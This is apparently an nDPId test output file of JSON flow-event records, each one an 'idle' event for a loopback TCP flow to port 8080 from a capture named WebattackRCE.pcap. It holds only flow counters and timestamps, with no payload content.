+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
